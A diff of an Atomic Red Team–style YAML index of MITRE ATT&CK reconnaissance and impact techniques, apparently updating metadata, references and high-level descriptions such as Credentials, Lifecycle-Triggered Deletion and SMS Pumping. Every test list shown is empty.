         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -56514,52 +57194,50 @@ reconnaissance:
         url: https://www.exploit-db.com/google-hacking-database
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1597:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
-      type: attack-pattern
-      created: '2020-10-02T17:01:42.558Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1597
-        url: https://attack.mitre.org/techniques/T1597
-      - source_name: D3Secutrity CTI Feeds
-        url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
-        description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
-          Intelligence Feeds. Retrieved October 20, 2020.
-      - source_name: ZDNET Selling Data
-        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
-        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
-          73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-04T13:12:14.469Z'
       name: Search Closed Sources
       description: |-
-        Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+        Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
 
         Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Barbara Louis-Sidney (OWN-CERT)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
+      type: attack-pattern
+      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+      created: '2020-10-02T17:01:42.558Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1597
+        external_id: T1597
+      - source_name: ZDNET Selling Data
+        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+          73 million user records on the dark web. Retrieved October 20, 2020.
+        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1592.003:
     technique:
@@ -56581,7 +57259,7 @@ reconnaissance:
         url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
         description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
           source code and proprietary data dumped online. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:22:46.759Z'
       name: Firmware
       description: |-
         Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -56597,8 +57275,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.002:
     technique:
@@ -56624,7 +57300,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:33:19.596Z'
       name: Software
       description: |-
         Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -56642,8 +57318,6 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.001:
     technique:
@@ -56665,7 +57339,7 @@ reconnaissance:
         url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:52:40.958Z'
       name: Social Media
       description: |-
         Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -56681,12 +57355,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.001:
     technique:
-      modified: '2023-04-14T23:29:10.396Z'
+      modified: '2024-10-10T13:45:01.069Z'
       name: Credentials
       description: "Adversaries may gather credentials that can be used during targeting.
         Account credentials gathered by adversaries may be those directly associated
@@ -56696,17 +57368,20 @@ reconnaissance:
         elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
         Adversaries may also compromise sites then add malicious content designed
         to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
-        Credential information may also be exposed to adversaries via leaks to online
-        or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
-        breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
-        Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
-        GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
-        may also purchase credentials from dark web or other black-markets. Finally,
-        where multi-factor authentication (MFA) based on out-of-band communications
-        is in use, adversaries may compromise a service provider to gain access to
-        MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
-        this information may reveal opportunities for other forms of reconnaissance
-        (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+        (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+        Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+        GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+        based on out-of-band communications is in use, adversaries may compromise
+        a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+        Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+        adversaries via leaks to online or other accessible data sets (ex: [Search
+        Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+        repositories, etc.). Adversaries may purchase credentials from dark web markets,
+        such as Russian Market and 2easy, or through access to Telegram channels that
+        distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+        2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+        Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+        for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
         or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
         establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
         and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
@@ -56718,6 +57393,7 @@ reconnaissance:
       - Vinayak Wadhwa, Lucideus
       - Lee Christensen, SpecterOps
       - Toby Kohlenberg
+      - Massimo Giaimo, Würth Group Cyber Defence Center
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -56728,7 +57404,7 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
       created: '2020-10-02T14:55:43.815Z'
@@ -56738,6 +57414,10 @@ reconnaissance:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1589/001
         external_id: T1589.001
+      - source_name: Bleeping Computer 2easy 2021
+        description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+          web marketplace for stolen data. Retrieved October 7, 2024.
+        url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
       - source_name: ATT ScanBox
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -56750,6 +57430,10 @@ reconnaissance:
         description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
           19, 2020.
         url: https://github.com/dxa4481/truffleHog
+      - source_name: Bleeping Computer Stealer Logs 2023
+        description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+          Stealer Logs in Context. Retrieved October 10, 2024.'
+        url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
       - source_name: Register Uber
         description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
           into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -56772,6 +57456,10 @@ reconnaissance:
           Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
           October 19, 2020.
         url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+      - source_name: SecureWorks Infostealers 2023
+        description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+          The Growing Threat from Infostealers. Retrieved October 10, 2024.
+        url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
       - source_name: Register Deloitte
         description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
           Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -56779,9 +57467,8 @@ reconnaissance:
         url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.003:
     technique:
@@ -56840,7 +57527,7 @@ reconnaissance:
         adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
         to access valuable information that can be exfiltrated or used to escalate
         privileges and move laterally. "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Wordlist Scanning
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -56860,7 +57547,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1591.004:
     technique:
@@ -56882,7 +57568,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:39:08.904Z'
       name: Identify Roles
       description: |-
         Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -56898,12 +57584,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598:
     technique:
-      modified: '2023-09-08T20:28:49.600Z'
+      modified: '2024-05-31T04:18:44.570Z'
       name: Phishing for Information
       description: "Adversaries may send phishing messages to elicit sensitive information
         that can be used during targeting. Phishing for information is an attempt
@@ -56972,7 +57656,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Avertium callback phishing
         description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
           PHISHING. Retrieved February 2, 2023.
@@ -57020,31 +57704,12 @@ reconnaissance:
         url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.001:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
-      type: attack-pattern
-      created: '2020-10-02T16:54:23.193Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1595.001
-        url: https://attack.mitre.org/techniques/T1595/001
-      - source_name: Botnet Scan
-        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
-        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
-          a Botnet. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:46:55.039Z'
       name: Scanning IP Blocks
       description: |-
         Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -57053,19 +57718,41 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Diego Sappa, Securonix
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
 
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+      created: '2020-10-02T16:54:23.193Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1595/001
+        external_id: T1595.001
+      - source_name: Botnet Scan
+        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+          a Botnet. Retrieved October 20, 2020.
+        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1590.001:
     technique:
@@ -57123,7 +57810,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.005:
     technique:
@@ -57144,7 +57830,7 @@ reconnaissance:
       - source_name: Shodan
         url: https://shodan.io
         description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:49.260Z'
       name: Scan Databases
       description: |-
         Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -57160,8 +57846,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.001:
     technique:
@@ -57187,7 +57871,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.025Z'
       name: Determine Physical Locations
       description: |-
         Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -57203,8 +57887,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.001:
     technique:
@@ -57228,7 +57910,7 @@ reconnaissance:
         url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
         description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
           Pad For Phishing Attacks. Retrieved October 20, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:43:12.843Z'
       name: Spearphishing Service
       description: |-
         Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -57250,13 +57932,11 @@ reconnaissance:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 impact:
   T1561.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:32:05.064Z'
       name: Disk Structure Wipe
       description: "Adversaries may corrupt or wipe the disk data structures on a
         hard drive necessary to boot a system; targeting specific critical systems
@@ -57348,13 +58028,12 @@ impact:
         url: https://www.symantec.com/connect/blogs/shamoon-attacks
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1498.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:54:49.943Z'
       name: Direct Network Flood
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -57363,7 +58042,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
@@ -57380,17 +58058,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
@@ -57415,7 +58088,8 @@ impact:
         url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491.002:
     technique:
@@ -57453,7 +58127,7 @@ impact:
         description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
           Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
           How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:37.539Z'
       name: External Defacement
       description: 'An adversary may deface systems external to an organization in
         an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -57487,12 +58161,10 @@ impact:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_impact_type:
       - Integrity
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1499.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:51.289Z'
       name: OS Exhaustion Flood
       description: |-
         Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -57557,42 +58229,127 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
-  T1499.003:
+  T1485.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
+      modified: '2024-10-16T21:27:02.481Z'
+      name: Lifecycle-Triggered Deletion
+      description: "Adversaries may modify the lifecycle policies of a cloud storage
+        bucket to destroy all objects stored within.  \n\nCloud storage buckets often
+        allow users to set lifecycle policies to automate the migration, archival,
+        or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+        GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+        has sufficient permissions to modify these policies, they may be able to delete
+        all objects at once. \n\nFor example, in AWS environments, an adversary with
+        the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+        API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+        in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+        to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+        adversaries may also perform this action on buckets storing cloud logs for
+        [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+        Datadog S3 Lifecycle CloudTrail Logs)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Storage: Cloud Storage Modification'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+      created: '2024-09-25T13:16:14.166Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1485/001
+        external_id: T1485.001
+      - source_name: AWS Storage Lifecycles
+        description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+          25, 2024.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+      - source_name: GCP Storage Lifecycles
+        description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+          September 25, 2024.
+        url: https://cloud.google.com/storage/docs/lifecycle
+      - source_name: Azure Storage Lifecycles
+        description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+          policy. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+      - source_name: Palo Alto Cloud Ransomware
+        description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+          in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+          2024.'
+        url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+      - source_name: Datadog S3 Lifecycle CloudTrail Logs
+        description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+          S3 Lifecycle Rule. Retrieved September 25, 2024.
+        url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.003:
+    technique:
+      modified: '2024-10-16T17:45:14.210Z'
+      name: SMS Pumping
+      description: |-
+        Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+        Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
